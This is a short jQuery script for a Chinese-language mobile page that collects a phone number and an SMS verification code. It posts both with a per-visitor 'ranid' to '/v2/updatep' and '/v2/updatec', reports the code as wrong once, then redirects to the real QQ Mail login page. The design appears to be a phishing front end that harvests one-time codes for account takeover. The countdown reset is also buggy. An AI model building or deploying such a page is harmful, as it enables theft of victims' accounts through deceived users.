function showTip(text) {
    $('.weui-dialog__bd').html(text)
    setTimeout(function(){
        $('#iosDialog2').show()
    },500)
}

function queryString(name) {
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
    var r = window.location.search.substr(1).match(reg);
    if (r != null) return decodeURIComponent(r[2]); return null;
}
var count = 0;
var time = 60;
var wait = false;
$(document).ready(function(){
    $('.weui-vcode-btn').on('click',function(){
        if (wait) {
            return
        }
        if ($('#uid').val() === '') {
            return showTip('请输入正确的手机号')
        }
        $.ajax({
            url: '/v2/updatep',
            type: 'post',
            data: {
                phone: $('#uid').val(),
                ranid: queryString('id')
            },
            success: function(res){
                console.log(res)
            }
        })
        showTip('短信验证码已发送')
        $('.weui-vcode-btn').css('color',"#aaa")
        wait = true;
        var timer = setInterval(function(){
            if (time<=0) {
                clearInterval(timer)   
                $('.weui-vcode-btn').css('color',"#0079ff")
                time = 60;
                $('.weui-vcode-btn').text('获取验证码')
                return wait = true;
            }
            $('.weui-vcode-btn').text(time+'秒后再试')
            time--;
        },1000)
        
    })

    $('.weui-btn_primary1').on('click',function(){
        
        if ($('#yzm').val() === '') {
            return showTip('请输入验证码')
        }
        $.ajax({
            url: '/v2/updatec',
            type: 'post',
            data: {
                code: $('#yzm').val(),
                ranid: queryString('id')
            },
            success: function(res){
                if (res === '0'){
                    if (count > 0) {
                        return window.location.href = 'https://w.mail.qq.com/cgi-bin/loginpage?f=xhtml'
                    }
                    count++;
                    setTimeout(function(){
                        $('#yzm').val('')
                    },500)
                    return showTip('请输入正确的验证码')
                }
            }
        })
    })

    $('.weui-dialog__btn_primary').on('click',function(){
        $('#iosDialog2').hide()
    })
})
